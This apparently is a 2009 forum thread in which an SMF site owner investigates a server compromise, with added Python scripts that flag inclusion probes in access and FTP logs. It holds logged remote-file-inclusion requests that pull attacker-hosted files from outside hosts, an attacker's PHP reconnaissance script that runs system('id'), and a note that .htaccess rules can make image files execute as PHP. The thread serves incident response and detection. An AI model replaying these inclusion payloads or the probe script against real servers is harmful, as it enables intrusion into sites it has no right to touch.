my SMF forum has been hacked

Started by societyofrobots, March 18, 2009, 02:38:19 AM


societyofrobots

My website has been hacked, but I can't figure out how or why. My host is now blaming it on a security flaw in SMF as the source of the hack. Let me explain . . .

A small percentage of my site visitors are reporting that when they visit my site a few things happen:

- pop-ups and redirects of spam/porn/etc. sites
- page attempts to install a javascript trojan virus (caught by virus scanners)
- creates an 'add on' to internet explorer and a memory process that replaced the add on if you disable it
- doesn't always happen

It happens on Google Chrome, Firefox, and IE browsers, also on both Windows and Linux. I'm using SMF 1.1.8.

Virus scanners clean the problem, seeing something like:
"Extracting files:-  reDistribtion\Download\Install\windows-kb890830-v2.8-delta.exe"
and "JS Redirector E trojan horse"

I asked the visitors to show me the source code of any page that causes a problem. The malicious code gets tacked on at the end of the normal page source. It's basically a highly obfuscated javascript, followed by random words, thousands of links to porn sites and other spam sites, a few links to my own site, etc. It's pretty nasty looking. I'll post it if anyone wants to see it.

The visitors reported it only happening to my .shtml pages, not the forum. But considering it only happens a small percentage of the time, that doesn't rule out the forum or SMF.

So first thing I think is, my site has been hacked. I look through all my source code, all my non-forum files, but nothing has been modified. Nothing tacked on. Everything looks clean. So that makes me think it's server level . . .

So I do a rootkit scan on my host, and get this:
/bin/kill  [ BAD ]
/sbin/insmod  [ BAD ]
/sbin/lsmod  [ BAD ]
/sbin/modprobe  [ BAD ]

All other files come out fine. So I contacted my host, Lunarpages, and they make this claim:
Quote
Hello I checked files:
/bin/kill [BAD]
/sbin/insmod [BAD]
/sbin/lsmod [BAD]
/sbin/modprobe [BAD]
They have not been changed. Sometimes scanners give erroneous information.

This is *their* default scanner. No idea why they'd use a scanner that gives erroneous information and not know why . . .

So after hassling them, I get them to check the logs and they find the information below. I apologize, but anyone who uses Lunarpages knows that they haven't yet learned how to format emails. I complain all the time, but they ignore it . . . at the end of their email, they blame SMF and php.ini. Throughout, the log shows weird links being tacked on to my forum links (robotforum/...):
Quote
Hello,

I have checked your Apache logs and found the following information :

212.187.255.241 - - [17/Mar/2009:05:08:59 -0700] "POST /xmlrpc.php HTTP/1.1" 404 6705 "-" "libwww-perl/5.65"
67.76.163.60 - - [17/Mar/2009:07:46:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 6907 "-" "libwww-perl/5.79"
67.76.163.60 - - [17/Mar/2009:07:47:03 -0700] "GET /robotforum//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 200 27047 "-" "libwww-perl/5.79"
212.117.165.14 - - [17/Mar/2009:09:56:18 -0700] "GET /content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 404 6758 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:17 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 14632 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:19 -0700] "GET /robotforum/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 404 6769 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:20 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 14632 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:21 -0700] "GET /robotforum/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 404 6769 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:21 -0700] "GET /content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 404 6758 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:39 -0700] "GET /robotforum/index.php?action=profile;u=281;sa=showPosts/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 19500 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:49 -0700] "GET /robotforum/index.php?action=profile;u=281;sa=showPosts/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 19563 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:58:42 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0%20/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 14632 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:59:06 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0%20/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 14632 "-" "libwww-perl/5.824"

It seems that the index.php is vulnerable to remote inclusion as you can see from the logs above. I have checked and there are no weird processes running on your VPS and checked the /tmp partition and it doesn't appear to be containing any exploit related files.

Please add the following lines within your php.ini configuration file :

allow_url_fopen = Off

I have checked and register_globals is currently set to off :

[root@vps tmp]# cat /etc/php.ini | grep register_globals
; - register_globals = Off [Security, Performance]
; Note that register_globals is going to be depracated (i.e., turned off by
; register_globals to be on; Using form variables as globals can easily lead
register_globals = Off

Please also upgrade your scripts to the latest version. Let us know if you have any questions or issues. We will be happy to respond to them. Thank you !

Kind Regards,
Margarit Mugurel
Junior System Admin I - System Administrator Team
Support and Assistance:
Help Desk - https://support.lunarpages.com/
Membership Forum - http://www.lunarforums.com/
Tutorials - http://www.lunarpages.com/tutorials/
Phones: U.S. & International - 1-714-521-8150

Well, looking at those links in the logs, I see php, such as from:
http://jiahn.com/ktools_v1/ktools/id.txt?
<?php
// The attacker's probe script as fetched from the URL above. Once included by a
// vulnerable page it reports basic host facts (kernel, user id, disk usage) back
// to whoever requested it, so a hit on this URL tells the attacker the inclusion worked.
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number / 1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number / 1024 / 1024);
    }
    return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}

echo "Insiderz<br>";
$un = @php_uname();
$id1 = system('id');
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;

echo "Insiderz was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


So then I look at my forum files, and immediately see tons of fake .html files that have names similar to legit files outside of my forum. For example, a legit file is news_read.shtml located outside my forum folder, but these fake files are located in the folder and labeled like news_read_e.html. No pattern to the naming, but something like this.

Annoyingly, I upgraded my forum to the latest version around Feb 7th, and all these fake files have been created on that same day. So I can't easily figure out which are hacked or not . . .

What do you recommend?!
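The host's log excerpt above is what remote-file-inclusion probing looks like in an Apache access log. Here is an added triage script (not from the thread, from SMF or from the host) that parses combined-format lines, splits the query string the way SMF does (on ';' as well as '&'), decodes double-encoded values, and flags any parameter that carries a URL or PHP code; the sample lines are four entries copied from the host's excerpt plus one constructed normal browser request.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, the layout of the host's excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A URL inside a parameter value is the remote-file-inclusion signature: the probe hopes
# that an include() built from that parameter will fetch and run the attacker's file.
REMOTE_URL_RE = re.compile(r'(?:^|[=/?&])(?:https?|ftp)://', re.IGNORECASE)
# PHP fragments smuggled into a parameter, as in highlight=%2527.include($_GET[a]),exit.%2527
CODE_RE = re.compile(
    r'\b(?:include|require|eval|system|passthru|shell_exec|exec)\s*\(|\$_(?:GET|POST|REQUEST)\[',
    re.IGNORECASE)
# Every probe in the thread came from a script library rather than a browser.
SCRIPT_UA_RE = re.compile(r'libwww-perl|curl|python-urllib|wget', re.IGNORECASE)

# Constructed sample: four lines copied from the host's excerpt plus one normal browser hit.
SAMPLE_LOG = """\
212.187.255.241 - - [17/Mar/2009:05:08:59 -0700] "POST /xmlrpc.php HTTP/1.1" 404 6705 "-" "libwww-perl/5.65"
67.76.163.60 - - [17/Mar/2009:07:47:03 -0700] "GET /robotforum//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 200 27047 "-" "libwww-perl/5.79"
212.117.165.14 - - [17/Mar/2009:09:56:17 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0/content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 200 14632 "-" "libwww-perl/5.824"
212.117.165.14 - - [17/Mar/2009:09:56:18 -0700] "GET /content.php?page=http://203.114.112.155/webboard1234/mic.txt??? HTTP/1.1" 404 6758 "-" "libwww-perl/5.824"
192.0.2.10 - - [17/Mar/2009:10:00:00 -0700] "GET /robotforum/index.php?topic=462.0 HTTP/1.1" 200 14632 "http://www.example.org/" "Mozilla/5.0"
"""


def split_query(target):
    """Return (key, decoded value) pairs; SMF separates parameters with ';' as well as '&'."""
    if '?' not in target:
        return []
    pairs = []
    for part in re.split(r'[&;]', target.split('?', 1)[1]):
        if part:
            key, _, value = part.partition('=')
            # Decode twice so double-encoded payloads (%2527 -> %27 -> ') become visible.
            pairs.append((unquote(key), unquote(unquote(value))))
    return pairs


def classify(entry):
    """Reasons an entry looks like an inclusion probe; an empty list means nothing suspicious."""
    reasons = []
    for key, value in split_query(entry['target']):
        if CODE_RE.search(value):
            reasons.append('code_in_param:' + key)
        if REMOTE_URL_RE.search(value):
            reasons.append('remote_url:' + key)
    if reasons and SCRIPT_UA_RE.search(entry['ua']):
        reasons.append('script_user_agent')
    return reasons


def scan_access_log(text):
    """Parse combined-format lines; return the suspicious entries with their reasons."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        entry = m.groupdict()
        entry['status'] = int(entry['status'])
        entry['reasons'] = classify(entry)
        if entry['reasons']:
            findings.append(entry)
    return findings


def hits_by_ip(findings):
    """Count probes per source address; a 200 on a probe is the one to look at first."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f['ip'], f['status'], f['target'][:60], f['reasons'])
    print(hits_by_ip(found))
```

A 200 on a probe only means the front page rendered (SMF ignores the junk parameters, as the replies below explain); confirm from the server side whether the referenced URL was ever fetched before treating it as a successful inclusion.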

societyofrobots

Just some additional notes . . .

A "_img" folder containing more fake files was found in the main directory.

Also some of the files in the main directory appeared to be overwritten, such as:
SSI.php
ssi_examples.shtml
ssi_examples.php
news_readme.html

I couldn't find anything else strange . . . but I'm definitely no php or web security expert!

I've repaired and deleted any and all the strangeness . . . but not sure if some backdoor is still hidden. I wonder if anything is hidden in the database . . .

Also, I determined the fake files were installed on 2/7/09, over a period of an hour from the first file to the last. The hack wasn't reported until more than a month later by users . . . a timed release?

karlbenson

These are attempted hacks, and the ones related to SMF will NOT work on smf.

It is COMMON for websites (not just smf) to get these attempted hacks for a variety of software.
On my old forum, I was getting hundreds of them daily for phpbb/joomla and vbulletin, even though I'd never used any of them on that domain/host.

They won't work on SMF because smf sanitizes/checks the $_GET url variables.  But that doesn't stop these people attempting them (more's the pity, it's a waste of resources).

Even though I know they won't work, I double-checked and tested on a fresh 1.1.8 install and none work for smf.
I can ONLY speak for the SMF related ones, I would suggest that these urls & SMF are NOT the method by which you were hacked.

However if you do manage to find an actual smf exploit, security reports can be sent via http://www.simplemachines.org/about/security.php

Best of luck with resolving your hacking issue, and getting your forum back.

Karl

societyofrobots

regularexpression, so what you are saying is, it's impossible for them to have modified the forum database in any way?

And that I have some other security flaw that allowed them to install files into my SMF directory?

The only php I am using is the forum. Outside of that, I don't have anything that would have security flaws . . . at least not the type that can be exploited in automated fashion . . .

Also, I forum banned the IPs that were used in the attack (according to the logs). Not sure what else to do . . . :(

karlbenson

SMF sanitizes them to make sure they are valid or just ignores them.
(but they will still get logged in your server logs).

They haven't got in SMF via that way.  Never say never that there isn't an as yet unknown unpatched exploit with smf.

However in my experience, this type of hack is usually as a result of a compromised host account.

If you're on a shared server, it might not even have been your account that was compromised, but another on that server
It would be the first time that that has happened.

Kenny01

Quote from: societyofrobots on March 18, 2009, 11:49:00 AM
regularexpression, so what you are saying is, it's impossible for them to have modified the forum database in any way?

And that I have some other security flaw that allowed them to install files into my SMF directory?

The only php I am using is the forum. Outside of that, I don't have anything that would have security flaws . . . at least not the type that can be exploited in automated fashion . . .

Also, I forum banned the IPs that were used in the attack (according to the logs). Not sure what else to do . . . :(
Are you on a shared host?

societyofrobots

Quote from: StarWars Fan on March 18, 2009, 12:00:39 PM
Where was the IP from?
see first post ;)
But actually it doesn't matter, it appears the hacker is using proxy sites so his IP is constantly changing. ::)

Quote from: Kenny01 on March 18, 2009, 05:59:31 PM
Are you on a shared host?
yes

So I had a closer look at my error logs myself and not trusting my host, and daaammmmnnn! It appears I've been the prime target for a hacker for a month or more! I see dozens of attacks onto my website, including lots of brute force stuff.

More importantly, I found fake files hidden outside of SMF directories.

And most strangely, I found a file called "at_domains_index.html" in my main directory with an odd script. When I try to copy/paste it anywhere, it immediately loads up the redirect porn link and javascript html. I can't copy/paste it alone!!! I suspect somehow my server loaded this file to redirect links . . . deleting it didn't break anything . . .

!wooha

1. don't "forum ban", ban with .htaccess. Don't just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.

For your site, you need to erase EVERYTHING (SAVING YOUR SETTINGS PHP) and upload fresh copies of everything.

they can put stuff in your database (like additional admin or moderator users) also, HTML with javascript in posts can steal your admin cookie or session to regain control.

finally, if you have access to exec(), then they could possibly set up a scheduled cron process to reinstall ******. :(

I figure you have a good 4-6 hours of work to do it right.  good luck

Kenny01

You need to first notify your host.

!wooha

Quote from: Kenny01 on March 19, 2009, 04:33:21 PM
You need to first notify your host.

hello??? don't you read before adding your bits of wisdom??

he's already been at it with his host for quite a while! :)

@societyofrobots
The "rootkit" scan you ran may not be worth the time you took to run it!
Why?

1. To really run a true "rootkit scan" you would have had to boot the physical server from a recovery CD and/or operate on an image of the drive when it is not running the operating system.
Since you are on shared hosting, there is no way you would have had access to do all that, unless you were sharing hosting with your Mom :P

2. The files it pointed out, while they may be used to do naughty things, are required and previously existing files on a Linux distro, so unless they have been modified, there is nothing to worry about (like they said)

Again, the fact that they have taken the trouble to install all those backdoor files shows that they were prepared to be in your a$$ for the long haul!

I would seriously consider escalating your response, i.e. assume that your personal PC may have been compromised, and run a scan on your local PC, check your local accounts (make sure, for example, that you don't have the same password for other accounts) and that you maybe change your CPANEL passwords.

Remember that when you change your passwords for a system, you change them ALL.

For instance, let's say somebody at your job used a keystroke logger to record your password to SMF and was able to capture it.
Suspecting this, you change your SMF password... BUT.. your SMF account has an email address associated with it, so if that email account is also compromised, then they/he can use the "Remind Me" feature to reacquire it.


societyofrobots

My concern is that if I don't even know how they got in, wiping my server clean and reinstalling won't achieve anything. It'll be just as insecure as before, and hacked again.

I would assume if the hacker has a back door setup, or I didn't patch the hole, I'll just see the same thing happen again. If not, I'm probably secure. It looks like an automated hack, not something specifically directed at me.

Quote1. dont  "forum ban", ban with .htaccess. Dont just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.
Way ahead of you. Unfortunately I can tell the hacker is using proxies. He has a *lot* of IP addresses . . .


an update:
It turns out at_domains_index.html is a file that's used for Plesk, the control panel for my site. If Plesk sees that file, it'll overrule the traditional index.html. Strangely, I had that option turned off, which means there is a good chance Plesk itself was somehow hacked. I just upgraded it to the 9.0 version from 8.6, but no way to really know . . .

Below is a highly abridged log of errors on only Feb 7th. I removed repeats (dozens) and obviously failed brute force hacks (thousands). The below is what I don't understand . . . of course, hacks that worked wouldn't be in the error log. My site gets heavy traffic, so I don't keep non-error logs for longer than a few days (60mb+ log file per day).


[client 77.221.130.5] script '/var/www/vhosts/societyofrobots.com/httpdocs/robotforum/errors.php' not found or unable to stat
[client 77.221.130.5] script '/var/www/vhosts/societyofrobots.com/httpdocs/errors.php' not found or unable to stat
[client 209.11.246.11] script '/var/www/vhosts/societyofrobots.com/httpdocs/index.php' not found or unable to stat
[Sat Feb 07 01:47:46 2009] [error] [client 222.79.60.234] File does not exist: /var/www/vhosts/societyofrobots.com/httpdocs/prxjdg.cgi
[Sat Feb 07 02:42:06 2009] [error] [client 201.255.169.142] malformed header from script. Bad header=All_is_OK: b282a0a7e598.pl
[Sat Feb 07 02:42:06 2009] [warn] /b282a0a7e598.pl did not send an HTTP header
[client 201.255.169.142] PHP Parse error:  parse error, unexpected '.' in /var/www/vhosts/societyofrobots.com/httpdocs/iddqd18.php on line 3
[Sat Feb 07 03:24:23 2009] [error] [client 77.221.130.2] File does not exist: /var/www/vhosts/societyofrobots.com/httpdocs/robotforum/index.php%3Ftopic%3D1103.0
[client 76.68.97.150] PHP Warning:  POST Content-Length of 298286612 bytes exceeds the limit of 8388608 bytes in Unknown on line 0, referer: http://societyofrobots.com/member_tutorials/node/287/edit
[Sat Feb 07 04:25:57 2009] [error] [client 66.249.70.108] File does not exist: /var/www/vhosts/societyofrobots.com/httpdocs/robot_arm_card_dealer.shtml&amp;usg=__lODvnpYsxvVPyRxv7uTQnZGsoC4=
[client 76.68.97.150] PHP Warning:  POST Content-Length of 298286609 bytes exceeds the limit of 8388608 bytes in Unknown on line 0, referer: http://societyofrobots.com/member_tutorials/node/287/edit
[client 74.200.223.213] script '/var/www/vhosts/societyofrobots.com/httpdocs/sub.php' not found or unable to stat
[client 74.200.223.213] script '/var/www/vhosts/societyofrobots.com/httpdocs/robotforum/sub.php' not found or unable to stat

!wooha

Quote from: societyofrobots on March 20, 2009, 06:31:40 AM
My concern is that if I don't even know how they got in, wiping my server clean and reinstalling won't achieve anything. It'll be just as insecure as before, and hacked again.

I would assume if the hacker has a back door setup, or I didn't patch the hole, I'll just see the same thing happen again. If not, I'm probably secure. It looks like an automated hack, not something specifically directed at me.

Quote1. dont  "forum ban", ban with .htaccess. Dont just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.
Way ahead of you. Unfortunately I can tell the hacker is using proxies. He has a *lot* of IP addresses . . .


I stand corrected - looking at your messages here again, I see that you have a VPS account, which is basically the same as a Dedicated Server : With ROOT access and all, only thing is that the physical machine runs a few other clients as well, correct? or is the tech guy misspeaking?

Yes, wiping it all out w/o knowing all can lead to a self cycling loop of constant repair, but you do have some advantages:

1. One, you know ****** can happen, did happen, probably/possibly will happen again so now you are gonna be prepared for it.
  a.

Quote
an update:
It turns out at_domains_index.html is a file that's used for Plesk, the control panel for my site. If Plesk sees that file, it'll overrule the traditional index.html. Strangely, I had that option turned off, which means there is a good chance Plesk itself was somehow hacked. I just upgraded it to the 9.0 version from 8.6, but no way to really know . . .

THERE IS A PLESK VULNERABILITY FOR THE VERSION YOU JUST UPGRADED FROM!
http://seclists.org/bugtraq/2008/Sep/0001.html

This has been around since August Last Year!
So if your upgrade has been only recently, you may have basically just wallpapered a wall with the termites already inside! (dont you just love exclamation points?? :P)


I would suggest:
1. reimaging your VPS, then immediately applying the upgrades to all the core apps. I say this because, since you are running VPS which means dedicated hosting, basically - your Apache settings and others may not have been set with the paranoia (and restrictions) that regular shared hosting may enjoy. * This is taken in an abundance of caution- depending on how much work/cost it is, I would do it for the peace of mind and knowing I am starting from a level field.

=YOUR FIRST AND MOST IMPORTANT STEP=
Ensure that even if someone gets a shell prompt (i.e. from PHP running exec() or system()) that THAT user context cannot execute anything important..
Now we have verified that the OS is running safe, we can reinstall the forum and rest of the site.

If you haven't already, I would suggest setting up a SVN or source control system, for all files:  that way you have a way of tracking those incremental mods that you make, giving you the ability to detect tampering, and rolling back your self-induced errors :)

P.S. For generally security re proxies:
I have a heavily commented .htaccess file (you may want to convert that to IPTABLES or other for efficiency) that bans just about all the server farms out there.

I also have a "realbrowser" detection script that deflects users using automated scripts like the libw/perl you have encountered (but are sneaky smart enough to change the user agent to fake a browser)

depending on your site, you may want to block some regions like Kazakhstan and Waristan who have 10 people who all want to come to my site to sell viagra!

metallica48423

If, for whatever reason, you think your VPS system is infected --- if you cannot within your means clean it, most certainly ask for it to be reimaged.  Many Virtuozzo containers providers will actually let you re-image it yourself.

Make sure to keep/backup all your account data though as you'll have to restore it!!
Justin O'Leary
Ex-Project Manager
Ex-Lead Support Specialist


societyofrobots

I'm still investigating this . . . posting the info in the hopes it'll help someone else, too . . . I'm pretty sure the hack did not involve SMF.

I'm also pretty sure now that the security hole was in Plesk 8.6.0, thanks for the link !wooha.

It occurred to me to look at my ftp transfer log, and I found more interesting stuff . . . the hack appears to have started at:
Sat Feb 7 02:41:41 2009
and ended at:
Sat Feb 7 10:07:32 2009
a single IP was used the entire time, 201.255.169.142
An action occurred every few seconds, from 8 to 30 seconds or so . . .

Looking at the log, I see these interesting lines . . .

Sat Feb 7 02:41:41 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ i r user ftp 0 * c
Sat Feb 7 02:41:47 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ d r user ftp 0 * c
Sat Feb 7 02:41:54 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ i r user ftp 0 * c
Sat Feb 7 02:41:57 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ d r user ftp 0 * c
Sat Feb 7 02:42:03 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ i r user ftp 0 * c
Sat Feb 7 02:42:07 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ d r user ftp 0 * c
Sat Feb 7 02:42:13 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ i r user ftp 0 * c
Sat Feb 7 02:42:19 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ d r user ftp 0 * c
Sat Feb 7 02:42:27 2009 1 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ i r user ftp 0 * c
Sat Feb 7 02:42:29 2009 0 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ d r user ftp 0 * c
Sat Feb 7 02:42:35 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ i r user ftp 0 * c
Sat Feb 7 02:42:39 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ d r user ftp 0 * c
Sat Feb 7 02:42:46 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ i r user ftp 0 * c
Sat Feb 7 02:42:48 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ d r user ftp 0 * c


You can google these files and actually find them . . . but opening them up didn't reveal anything my noob self could identify. Now I also saw this:


Sat Feb 7 03:02:47 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ i r user ftp 0 * c
Sat Feb 7 03:04:44 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ d r user ftp 0 * c


so googling it, I find errors such as:

[09-Feb-2009 08:10:05] PHP Parse error:  syntax error, unexpected '.' in /home/some_site/public_html/iddqd18.php on line 3


The dates on those errors are all January and February, so it's a hack that's been around for awhile . . . but one result has 2007 as the date . . . maybe it's a legit file name?

Anyway, the rest of the log file shows the hacker downloading many of my site pages and uploading his files . . . I guess it didn't help I had anonymous ftp enabled, oops!

I gotta figure out how the hack happened, I can be overzealous sometimes . . . >:(

!wooha

ok... what you see there is a 'basic probe'

various code files in different languages (.PY = python, .php = PHP, .asp = "ASP - active server pages" )

If you still had your HTML logs, you may have found that there was a GET or HEAD request for each one of those files, and, based on the response, he would have known exactly what kind of code your server can run.

Now the IP address when googled, actually only pointed back to this thread.
This to me is a good thing. This means that the IP hasn't been whored about that much yet, and the number of parties publicly using it is probably small and may be only one person!.

I would report the intrusion to the FBI and retain any logs. Also, I would make a direct complaint to the isp behind it.
Why the FBI? <shrug> I pay my taxes, I don't care if they are overworked! lol, anyway, it all goes into this magical database in the sky, if this guy ever gets caught, your report may mean the difference between probation and jail time, account warning, or cancellation, so yeah, report the little fuc*ker :angry-face-smiley:

Yeah... anon FTP...lol... that may have been the real culprit even tho there was an exploit with Plesk, FTP is soooooo much easier!.

Here's what I recommend.
Get an account at 1and1 for $5/month.

(cheap, fast, lots of space! Their support is ******ty, but we won't be using their support, just space, bandwidth and a little bit of scripting)

On the 1and1 site, we gonna install a little script that will connect to your server, and FTP over the files (it will basically do a server to server backup)
With shell access on your main server, you will execute a command to zip up everything, but instead of downloading the backup over your relatively slow ISP, we do the server to server...blindingly fast!

like metallica48423 sayz: Backup Backup Backup Backup .
Discuss with your host the consequences (and costs) of a reimage. Note that a re-image means just that: If the image was made in January and security releases made in March, then you would have to upgrade security after your clean image.

Do three zip file backups, the Attachments, Avatars and code folders.
(and also separately save your settings.php)

I would def go with a reimage tho... no telling what crap is there (I certainly can't, not knowing how secure/insecure it was to begin with) so you have to balance the cost of the uncertainty against the cost of reimaging it all.

at the very least,we want to clear out the entire webspace AND COPY FRESH VERSIONS OF SMF AND MODS, DOWNLOADED FROM ORIGINAL SOURCES.

The folders etc will be the same.

Now you will go through (locally) the avatar and attachments folders and check the .htaccess files to make sure they match the original files from SMF! This is because you can put a command in .htaccess to tell it "parse and execute .GIF files as PHP!" then, they upload an avatar or something, and then..

www.yoursite/folder/nastyavatar.gif (but its really a php file that opens up a whole can of worms all over again)

so we check that.

We also should check the database (forum) for any HTML (scripting) that has been added to steal your cookies. - again, the chance of this is generally pretty low, and it's a bit of work, but this guy is obviously a professional who knows what he's about - and so should you!

There is a setting in SMF that disables HTML in posts; also disable Flash too. Unfortunately for you, SMF doesn't disable HTML in headings like forum headings/names, so, if as a backdoor person he gave himself admin privileges, he COULD have edited some headings to call nasty scripts (this is easy to check: a quick MySQL query for '<' and its entity equivalent should suffice).

Now we know our database and all is clear, we can create a mySQLdump and transfer the files over to our holding server as well.


This second site is also useful for the following.

If you ever have to take down the main site, for any reason, you can temporarily redirect to HTML static pages on the other site. I say "html static" because you don't want to overwhelm the simple shared hosting of that account.

good luck!

I estimate you have a good 4-6 hours of work to do. :D
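The upload-then-delete pattern !wooha describes (one stem, one extension per interpreter, each file gone again within seconds) can be pulled out of an xferlog automatically. Here is an added script, not from the thread or from SMF, that parses xferlog-format lines and reports capability probes, short-lived uploads, script uploads that were never deleted, and anything uploaded over an anonymous login; the sample lines are copies of the entries from societyofrobots' post plus two constructed ones at the end (a script upload that survives, made over an anonymous login, and a normal image upload).

```python
from collections import defaultdict
from datetime import datetime
from os.path import basename, splitext

# Extensions a "which interpreters are installed?" probe cycles through.
SCRIPT_EXTS = {'.php', '.pl', '.cgi', '.py', '.rb', '.asp', '.aspx', '.jsp', '.sh'}

# Constructed sample: entries copied from the thread's xferlog, then two constructed lines.
SAMPLE_XFERLOG = """\
Sat Feb 7 02:41:41 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ i r user ftp 0 * c
Sat Feb 7 02:41:47 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ d r user ftp 0 * c
Sat Feb 7 02:41:54 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ i r user ftp 0 * c
Sat Feb 7 02:41:57 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ d r user ftp 0 * c
Sat Feb 7 02:42:03 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ i r user ftp 0 * c
Sat Feb 7 02:42:07 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ d r user ftp 0 * c
Sat Feb 7 02:42:13 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ i r user ftp 0 * c
Sat Feb 7 02:42:19 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ d r user ftp 0 * c
Sat Feb 7 02:42:27 2009 1 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ i r user ftp 0 * c
Sat Feb 7 02:42:29 2009 0 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ d r user ftp 0 * c
Sat Feb 7 02:42:35 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ i r user ftp 0 * c
Sat Feb 7 02:42:39 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ d r user ftp 0 * c
Sat Feb 7 02:42:46 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ i r user ftp 0 * c
Sat Feb 7 02:42:48 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ d r user ftp 0 * c
Sat Feb 7 03:02:47 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ i r user ftp 0 * c
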